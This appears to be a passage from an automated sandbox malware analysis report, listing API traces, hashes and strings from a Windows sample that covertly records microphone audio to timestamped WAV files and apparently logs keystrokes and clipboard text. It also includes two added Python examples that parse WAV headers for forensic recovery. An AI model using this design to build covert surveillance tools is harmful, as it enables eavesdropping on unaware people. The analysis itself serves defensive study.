                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,004095BF,00409BF5), ref: 004094B9
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,004095BF,00409BF5), ref: 004094C5
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@D@1@@$D@2@@0@Hstd@@V01@V01@@V?$basic_string@Y?$basic_string@$V10@@$Enum$InfoQueryV10@0@Value_itoa
                              • String ID: [regsplt]
                              • API String ID: 1517376382-4262303796
                              • Opcode ID: 30431976b1ae715cd0fc3e13eb5c78d9e9581a0f57f9494c5079139dd48f7a99
                              • Instruction ID: f30101ecd5197dc84c436124cfbb1774ebe9f78b1b9e58743e63aaff6b42f93f
                              • Opcode Fuzzy Hash: 30431976b1ae715cd0fc3e13eb5c78d9e9581a0f57f9494c5079139dd48f7a99
                              • Instruction Fuzzy Hash: 0471E97290011EAFDB11DBA0DD89DEEB77CFB48304F0041B6E606E2151DB749E898F64
                              APIs
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00401539
                              • closesocket.WS2_32 ref: 00401564
                              • ExitThread.KERNEL32 ref: 00401572
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000020,?,00415268,00000000), ref: 0040159E
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(004151D8,00000012,?,00415268,00000000), ref: 004015B4
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,playaudio,00415268,00000000), ref: 004015C5
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,00000000), ref: 004015D2
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,00000000), ref: 004015DF
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,00000000), ref: 004015EC
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004015F9
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00401609
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00401615
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401621
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040162A
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401633
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040163C
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401645
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040164E
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401657
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401663
                              • waveInUnprepareHeader.WINMM(-0041519C,00000020), ref: 00401680
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004016A5
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004016EB
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$V10@0@$??0?$basic_string@$D@1@@$V01@@$??4?$basic_string@ExitHeaderThreadUnprepareV01@V10@@closesocketwave
                              • String ID: playaudio
                              • API String ID: 2056009259-1314764895
                              • Opcode ID: 3742e07a2a259b882a403f627092aaa57361fb2f085af106636733a191568580
                              • Instruction ID: 76c54256c40fbbf35d32c407d69db5079ebfec01750c77bb5de673180f13f9b1
                              • Opcode Fuzzy Hash: 3742e07a2a259b882a403f627092aaa57361fb2f085af106636733a191568580
                              • Instruction Fuzzy Hash: 2F416F72900109ABDB01EBA0ED4EADE777CFB55305F104176F506E21A1EE785E48CB68
                              APIs
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,00000000,00415A30,00000000), ref: 004022FC
                              • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00415258,00410668), ref: 00402314
                              • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00402323
                              • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040232D
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,00000000), ref: 00402346
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040234F
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 0040235D
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,00415A60), ref: 0040236E
                              • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040238E
                              • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00415258,00410668), ref: 004023A6
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 004023B8
                              • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,0000000F,6A3F5E04), ref: 004023CE
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004023D8
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004023E1
                              • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,?), ref: 004023F2
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004023FC
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402405
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00402419
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 0040242F
                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0040243A
                              • CreateThread.KERNEL32(00000000,00000000,004022AD,00415A30,00000000,00000000), ref: 0040244B
                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00402456
                              • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,0040FC60,6A3F5E04), ref: 0040246B
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00402475
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040247E
                              • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00402487
                              • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00402499
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004024A7
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$V01@@$??4?$basic_string@V01@$??1?$basic_string@$?length@?$basic_string@?substr@?$basic_string@V12@$??0?$basic_string@??9std@@CreateD@2@@0@V?$basic_string@$?c_str@?$basic_string@?data@?$basic_string@?size@?$basic_string@D@1@@EventObjectSingleThreadWait
                              • String ID:
                              • API String ID: 2944316355-0
                              • Opcode ID: aad691de20132ca68f57e677d5fc682d1c060bbf91795a29eecf0d4de655ffa4
                              • Instruction ID: 8ff35d7655066902be5676fb1ff2957b2f75ed0f81b6480087796954eca2c198
                              • Opcode Fuzzy Hash: aad691de20132ca68f57e677d5fc682d1c060bbf91795a29eecf0d4de655ffa4
                              • Instruction Fuzzy Hash: 3E51FB7150020AEFCB049FA4ED9DDEE7F79FF44345B00816AF546A21A0DFB49989CB58
                              APIs
                              • ??0?$basic_fstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z.MSVCP60(00401A91,00000022,00000001,?,00415160), ref: 00401710
                              • ?seekp@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@JW4seekdir@ios_base@2@@Z.MSVCP60(00000000,00000000,?,00415160), ref: 00401765
                              • ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(RIFF,00000004,?,00415160), ref: 0040177A
                              • ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(00401A91,00000004,?,00415160), ref: 0040178B
                              • ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(WAVE,00000004,?,00415160), ref: 0040179D
                              • ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(fmt ,00000004,?,00415160), ref: 004017AF
                              • ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(00000010,00000004,?,00415160), ref: 004017C0
                              • ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(?,00000002,?,00415160), ref: 004017D2
                              • ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(004151DA,00000002,?,00415160), ref: 004017E5
                              • ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(004151DC,00000004,?,00415160), ref: 004017F7
                              • ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(00000000,00000004,?,00415160), ref: 00401808
                              • ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(00401A91,00000002,?,00415160), ref: 0040181A
                              • ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(004151E6,00000002,?,00415160), ref: 0040182D
                              • ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(data,00000004,?,00415160), ref: 0040183F
                              • ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(?,00000004,?,00415160), ref: 00401850
                              • ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(?,?,?,00415160), ref: 00401861
                              • ?close@?$basic_fstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60(?,00415160), ref: 0040186D
                              • ??_D?$basic_fstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60(?,00415160), ref: 00401879
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: D@std@@@std@@U?$char_traits@$V12@$?write@?$basic_ostream@$??0?$basic_fstream@?close@?$basic_fstream@?seekp@?$basic_ostream@D?$basic_fstream@W4seekdir@ios_base@2@@
                              • String ID: RIFF$WAVE$data$fmt
                              • API String ID: 766087772-4212202414
                              • Opcode ID: 52a0db0d95ad37626374cffde14f3dfd6f79d3945ae441a7bf68ff1ddc81c4b6
                              • Instruction ID: d7aee1695a5c952c579fb531cba5a3b8ffd14c1b073e8637df3e8a3bae7d5bfd
                              • Opcode Fuzzy Hash: 52a0db0d95ad37626374cffde14f3dfd6f79d3945ae441a7bf68ff1ddc81c4b6
                              • Instruction Fuzzy Hash: A1410931A0121DEFDB24DB60DC4DFDA7B78FB59701F5080A9F156A20A0DBB05A84CF55
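The sequence of write() calls above is the canonical 44-byte PCM WAV layout: "RIFF", riff_size, "WAVE", "fmt ", 16, format_tag (2 bytes), channels (2), sample_rate (4), byte_rate (4), block_align (2), bits_per_sample (2), "data", data_size, then the samples. The code below is an added example, not from the report or the sample: it rebuilds a file in that field order and parses one back, reporting every inconsistency between the declared and actual sizes (as left by a file truncated on disk or in transit). The field meanings are the standard WAV ones; the audio bytes are constructed silence.

```python
"""Parse and rebuild the 44-byte RIFF/WAVE header written by the function above.

Added example, not code from the Joe Sandbox report or from the sample. The
sample audio used in __main__ and in the checks is constructed silence.
"""
import struct

HEADER_FMT = "<4sI4s4sIHHIIHH4sI"   # little-endian, 44 bytes in total
HEADER_SIZE = struct.calcsize(HEADER_FMT)


def build_wav(samples: bytes, channels: int = 1, sample_rate: int = 8000,
              bits: int = 16, format_tag: int = 1) -> bytes:
    """Emit header + samples in the same field order as the function above."""
    block_align = channels * bits // 8
    byte_rate = sample_rate * block_align
    header = struct.pack(HEADER_FMT, b"RIFF", 36 + len(samples), b"WAVE",
                         b"fmt ", 16, format_tag, channels, sample_rate,
                         byte_rate, block_align, bits, b"data", len(samples))
    return header + samples


def parse_wav_header(blob: bytes) -> dict:
    """Decode the header and list every inconsistency found."""
    if len(blob) < HEADER_SIZE:
        raise ValueError("shorter than a WAV header")
    (riff, riff_size, wave, fmt, fmt_size, format_tag, channels, sample_rate,
     byte_rate, block_align, bits, data, data_size) = struct.unpack(
        HEADER_FMT, blob[:HEADER_SIZE])
    if (riff, wave, fmt, data) != (b"RIFF", b"WAVE", b"fmt ", b"data"):
        raise ValueError("not a plain 44-byte PCM WAV header")
    problems = []
    if fmt_size != 16:
        problems.append(f"fmt chunk size {fmt_size}, expected 16")
    if block_align != channels * bits // 8:
        problems.append("block_align does not match channels * bits / 8")
    if byte_rate != sample_rate * block_align:
        problems.append("byte_rate does not match sample_rate * block_align")
    if riff_size != 36 + data_size:
        problems.append("riff_size does not match 36 + data_size")
    present = len(blob) - HEADER_SIZE
    if data_size != present:
        problems.append(f"data_size {data_size} but {present} bytes present")
    return {
        "format_tag": format_tag, "channels": channels,
        "sample_rate": sample_rate, "byte_rate": byte_rate,
        "block_align": block_align, "bits_per_sample": bits,
        "data_size": data_size,
        "duration_s": present / byte_rate if byte_rate else None,
        "problems": problems,
    }


if __name__ == "__main__":
    wav = build_wav(bytes(2 * 8000))                # one second of 16-bit mono silence
    print(parse_wav_header(wav))
    print(parse_wav_header(wav[:1000])["problems"])  # a cut-off file
```

The duration is derived from the bytes actually present rather than from data_size, so a recording whose header says more than the file holds still yields a usable estimate of how much audio was captured.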
                              APIs
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 004019BA
                              • time.MSVCRT ref: 004019D2
                              • localtime.MSVCRT ref: 004019DC
                              • strftime.MSVCRT ref: 004019F1
                              • puts.MSVCRT ref: 004019FE
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,.wav), ref: 00401A1A
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@D@Z.MSVCP60(?,004151A8,0000005C,00000000), ref: 00401A2C
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,00000000), ref: 00401A39
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,00000000), ref: 00401A46
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,00000000), ref: 00401A52
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00000000), ref: 00401A5B
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00000000), ref: 00401A64
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00000000), ref: 00401A6D
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00000000), ref: 00401A76
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00415160,?,?,?,?,?,?,?,?,00000000), ref: 00401A85
                                • Part of subcall function 004016F6: ??0?$basic_fstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z.MSVCP60(00401A91,00000022,00000001,?,00415160), ref: 00401710
                                • Part of subcall function 004016F6: ?seekp@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@JW4seekdir@ios_base@2@@Z.MSVCP60(00000000,00000000,?,00415160), ref: 00401765
                                • Part of subcall function 004016F6: ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(RIFF,00000004,?,00415160), ref: 0040177A
                                • Part of subcall function 004016F6: ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(00401A91,00000004,?,00415160), ref: 0040178B
                                • Part of subcall function 004016F6: ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(WAVE,00000004,?,00415160), ref: 0040179D
                                • Part of subcall function 004016F6: ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(fmt ,00000004,?,00415160), ref: 004017AF
                                • Part of subcall function 004016F6: ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(00000010,00000004,?,00415160), ref: 004017C0
                                • Part of subcall function 004016F6: ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(?,00000002,?,00415160), ref: 004017D2
                                • Part of subcall function 004016F6: ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(004151DA,00000002,?,00415160), ref: 004017E5
                                • Part of subcall function 004016F6: ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(004151DC,00000004,?,00415160), ref: 004017F7
                                • Part of subcall function 004016F6: ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(00000000,00000004,?,00415160), ref: 00401808
                                • Part of subcall function 004016F6: ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(00401A91,00000002,?,00415160), ref: 0040181A
                                • Part of subcall function 004016F6: ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(004151E6,00000002,?,00415160), ref: 0040182D
                                • Part of subcall function 004016F6: ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(data,00000004,?,00415160), ref: 0040183F
                                • Part of subcall function 004016F6: ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(?,00000004,?,00415160), ref: 00401850
                                • Part of subcall function 004016F6: ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(?,?,?,00415160), ref: 00401861
                              • waveInUnprepareHeader.WINMM(00415160,00000020,?,?,?,?,?,?,?,00000000), ref: 00401A9C
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,00000000), ref: 00401AA7
                              • waveInPrepareHeader.WINMM(00415160,00000020,?,?,?,?,?,?,?,00000000), ref: 00401ADB
                              • waveInAddBuffer.WINMM(00415160,00000020,?,?,?,?,?,?,?,00000000), ref: 00401AEA
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,00000000), ref: 00401AF4
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: U?$char_traits@$D@std@@@std@@$V12@V?$allocator@$?write@?$basic_ostream@$D@std@@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@wave$??0?$basic_string@?c_str@?$basic_string@D@1@@HeaderV10@$??0?$basic_fstream@??4?$basic_string@?seekp@?$basic_ostream@BufferPrepareUnprepareV01@V01@@V10@0@W4seekdir@ios_base@2@@localtimeputsstrftimetime
                              • String ID: %Y-%m-%d %H.%M$.wav
                              • API String ID: 866339126-3597965672
                              • Opcode ID: e336fa7229d51b92b370b467780b3a0970c49e63df0d216bebf50965dbcfc115
                              • Instruction ID: a5d7e3b402908acd5397dec8a66d2258045444051812afed8a23243a24f6b54c
                              • Opcode Fuzzy Hash: e336fa7229d51b92b370b467780b3a0970c49e63df0d216bebf50965dbcfc115
                              • Instruction Fuzzy Hash: 3431AA71D40209FFDB51DBA0EC4DADE7B78EB44305F448476F609E21A0EBB49589CB58
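Analyst note (added example, not code from the sample or from the Joe Sandbox report): the two routines above capture microphone audio through waveIn* and write it to a file named with strftime("%Y-%m-%d %H.%M") + ".wav"; the subcall at 004016F6 emits a 44-byte canonical PCM WAV header field by field (RIFF, size, WAVE, "fmt ", 16, format tag, channels, sample rate, byte rate, block align, bits per sample, "data", size). The Python below rebuilds that header layout, parses and sanity-checks it so recovered captures can be validated or carved from disk, and matches the filename pattern. Sample rate, channel count and bit depth are assumptions (the trace leaves those values unresolved); only the field order and sizes come from the trace.

```python
import re
import struct
from datetime import datetime
from typing import Optional

# Header layout in the order the traced routine writes it (all little-endian):
# "RIFF", riff_size, "WAVE", "fmt ", fmt_size=16, format_tag(2), channels(2),
# sample_rate(4), byte_rate(4), block_align(2), bits_per_sample(2), "data", data_size
WAV_HEADER = struct.Struct("<4sI4s4sIHHIIHH4sI")
assert WAV_HEADER.size == 44

# Filename pattern derived from the strftime format and ".wav" suffix seen in the trace
CAPTURE_NAME = re.compile(r"^(\d{4})-(\d{2})-(\d{2}) (\d{2})\.(\d{2})\.wav$")


def build_wav(pcm: bytes, channels: int = 1, sample_rate: int = 8000, bits: int = 16) -> bytes:
    """Reproduce the header layout from the trace around raw PCM samples.
    Default format parameters are assumptions, not values recovered from the sample."""
    block_align = channels * bits // 8
    byte_rate = sample_rate * block_align
    header = WAV_HEADER.pack(
        b"RIFF", 36 + len(pcm), b"WAVE", b"fmt ", 16, 1, channels,
        sample_rate, byte_rate, block_align, bits, b"data", len(pcm))
    return header + pcm


def parse_wav_header(blob: bytes) -> Optional[dict]:
    """Return the header fields if blob starts with a consistent PCM WAV header, else None.
    Used to validate or carve recovered captures; riff_size is reported, not enforced,
    because a writer may leave it inconsistent."""
    if len(blob) < WAV_HEADER.size:
        return None
    (riff, riff_size, wave, fmt, fmt_size, tag, channels, rate, byte_rate,
     block_align, bits, data, data_size) = WAV_HEADER.unpack_from(blob)
    if riff != b"RIFF" or wave != b"WAVE" or fmt != b"fmt " or data != b"data":
        return None
    if fmt_size != 16 or tag != 1:  # 16-byte fmt chunk and PCM, as the trace writes
        return None
    if channels == 0 or bits not in (8, 16, 24, 32):
        return None
    if block_align != channels * bits // 8 or byte_rate != rate * block_align:
        return None
    return {
        "channels": channels, "sample_rate": rate, "bits": bits,
        "data_size": data_size, "riff_size": riff_size,
        "riff_size_consistent": riff_size == 36 + data_size,
    }


def is_capture_name(name: str) -> bool:
    """True if name matches the 'YYYY-MM-DD HH.MM.wav' pattern and encodes a real timestamp."""
    m = CAPTURE_NAME.match(name)
    if not m:
        return False
    try:
        datetime(*map(int, m.groups()))
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    # Constructed sample input: 1024 bytes of synthetic PCM
    blob = build_wav(bytes(range(256)) * 4)
    print(parse_wav_header(blob))
    print(is_capture_name("2024-06-28 14.05.wav"))
```

On a compromised host, files matching `is_capture_name` in the sample's working directory are candidate audio captures; `parse_wav_header` confirms they carry the header this writer produces before they are handed to an audio tool.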
                              APIs
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(004108C8,?,00000000,?,753DC0D0,?), ref: 00404E88
                              • toupper.MSVCRT ref: 00404E97
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60( [Ctrl + ,?,00000000), ref: 00404EAB
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@D@Z.MSVCP60(?,00000000), ref: 00404EB6
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00404ED2
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00404EDB
                              • toupper.MSVCRT ref: 00404F6E
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00404EC0
                                • Part of subcall function 00403A9A: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,76F90F00,?,00405E64), ref: 00403AAD
                                • Part of subcall function 00403A9A: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,76F90F00,?,00405E64), ref: 00403AC0
                                • Part of subcall function 00403A9A: SetEvent.KERNEL32(00000000,?,00405E64), ref: 00403AC9
                                • Part of subcall function 00403A9A: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(76F90F00,?,00405E64), ref: 00403AD8
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,[End of clipboard text],00000000,?,753DC0D0,?), ref: 00404EE4
